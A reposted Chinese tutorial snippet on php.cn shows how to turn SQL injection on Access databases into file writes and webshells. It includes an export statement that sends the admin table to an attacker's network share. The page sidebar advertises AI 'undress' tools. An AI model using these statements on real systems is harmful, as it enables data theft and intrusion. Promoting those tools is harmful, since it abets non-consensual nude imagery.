Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home Database Mysql Tutorial SQL注入Access导出WebShell

SQL注入Access导出WebShell

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 07, 2016 pm 03:43 PM
access sql webshell indivual Export injection

已经听 N 个人过说有人已经发现 SQL 注入 Access 得到 webshell 的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到 Jet 的安全,然后灵光一闪,呵呵,发现了一种可以利用 access 导出 asp 的方法,分享之。 几个月之前网上就流传

 

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txthtmhtml等格式)的方法:

 

SELECT * into [test.txt] in 'd:/web/' 'text;' from admin

 

执行上述语句,在d:/web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE/Software/Microsoft/Jet/4.0/Engines/Text/DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

这个方法跟那个调用AccessShell函数执行命令一样,要修改注册表,所以利用不是很大。

顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in '//yourip/share' 'text;' from admin

 

 

 

 

 

 

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Show More

Hot Article

What's New in Windows 11 KB5054979 & How to Fix Update Issues
3 weeks ago By DDD
How to fix KB5055523 fails to install in Windows 11?
3 weeks ago By DDD
InZoi: How To Apply To School And University
4 weeks ago By DDD
How to fix KB5055518 fails to install in Windows 10?
3 weeks ago By DDD
Where to find the Site Office Key in Atomfall
4 weeks ago By DDD
Show More

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Show More

Hot Topics

Where is the login entrance for gmail email?
7873
15
Java Tutorial
1649
14
CakePHP Tutorial
1409
52
Laravel Tutorial
1301
25
PHP Tutorial
1245
29
Show More
Related knowledge
How to configure zend for apache How to configure zend for apache Apr 13, 2025 pm 12:57 PM

How to configure Zend in Apache? The steps to configure Zend Framework in an Apache Web Server are as follows: Install Zend Framework and extract it into the Web Server directory. Create a .htaccess file. Create the Zend application directory and add the index.php file. Configure the Zend application (application.ini). Restart the Apache Web server.

How to monitor Nginx SSL performance on Debian How to monitor Nginx SSL performance on Debian Apr 12, 2025 pm 10:18 PM

This article describes how to effectively monitor the SSL performance of Nginx servers on Debian systems. We will use NginxExporter to export Nginx status data to Prometheus and then visually display it through Grafana. Step 1: Configuring Nginx First, we need to enable the stub_status module in the Nginx configuration file to obtain the status information of Nginx. Add the following snippet in your Nginx configuration file (usually located in /etc/nginx/nginx.conf or its include file): location/nginx_status{stub_status

What is apache server? What is apache server for? What is apache server? What is apache server for? Apr 13, 2025 am 11:57 AM

Apache server is a powerful web server software that acts as a bridge between browsers and website servers. 1. It handles HTTP requests and returns web page content based on requests; 2. Modular design allows extended functions, such as support for SSL encryption and dynamic web pages; 3. Configuration files (such as virtual host configurations) need to be carefully set to avoid security vulnerabilities, and optimize performance parameters, such as thread count and timeout time, in order to build high-performance and secure web applications.

Nginx performance monitoring and troubleshooting tools Nginx performance monitoring and troubleshooting tools Apr 13, 2025 pm 10:00 PM

Nginx performance monitoring and troubleshooting are mainly carried out through the following steps: 1. Use nginx-V to view version information, and enable the stub_status module to monitor the number of active connections, requests and cache hit rate; 2. Use top command to monitor system resource occupation, iostat and vmstat monitor disk I/O and memory usage respectively; 3. Use tcpdump to capture packets to analyze network traffic and troubleshoot network connection problems; 4. Properly configure the number of worker processes to avoid insufficient concurrent processing capabilities or excessive process context switching overhead; 5. Correctly configure Nginx cache to avoid improper cache size settings; 6. By analyzing Nginx logs, such as using awk and grep commands or ELK

How to use Debian Apache logs to improve website performance How to use Debian Apache logs to improve website performance Apr 12, 2025 pm 11:36 PM

This article will explain how to improve website performance by analyzing Apache logs under the Debian system. 1. Log Analysis Basics Apache log records the detailed information of all HTTP requests, including IP address, timestamp, request URL, HTTP method and response code. In Debian systems, these logs are usually located in the /var/log/apache2/access.log and /var/log/apache2/error.log directories. Understanding the log structure is the first step in effective analysis. 2. Log analysis tool You can use a variety of tools to analyze Apache logs: Command line tools: grep, awk, sed and other command line tools.

Using Dicr/Yii2-Google to integrate Google API in YII2 Using Dicr/Yii2-Google to integrate Google API in YII2 Apr 18, 2025 am 11:54 AM

VprocesserazrabotkiveB-enclosed, Мнепришлостольностьсясзадачейтерациигооглапидляпапакробоглесхетсigootrive. LEAVALLYSUMBALLANCEFRIABLANCEFAUMDOPTOMATIFICATION, ČtookazaLovnetakProsto, Kakaožidal.Posenesko

Nginx log analysis and statistics to understand website access Nginx log analysis and statistics to understand website access Apr 13, 2025 pm 10:06 PM

This article describes how to analyze Nginx logs to improve website performance and user experience. 1. Understand the Nginx log format, such as timestamps, IP addresses, status codes, etc.; 2. Use tools such as awk to parse logs and count indicators such as visits, error rates, etc.; 3. Write more complex scripts according to needs or use more advanced tools, such as goaccess, to analyze data from different dimensions; 4. For massive logs, consider using distributed frameworks such as Hadoop or Spark. By analyzing logs, you can identify website access patterns, improve content strategies, and ultimately optimize website performance and user experience.

How to solve nginx current limit How to solve nginx current limit Apr 14, 2025 pm 12:06 PM

The Nginx current limit problem can be solved by: use ngx_http_limit_req_module to limit the number of requests; use ngx_http_limit_conn_module to limit the number of connections; use third-party modules (ngx_http_limit_connections_module, ngx_http_limit_rate_module, ngx_http_access_module) to implement more current limit policies; use cloud services (Cloudflare, Google Cloud Rate Limiting, AWS WAF) to DD

See all articles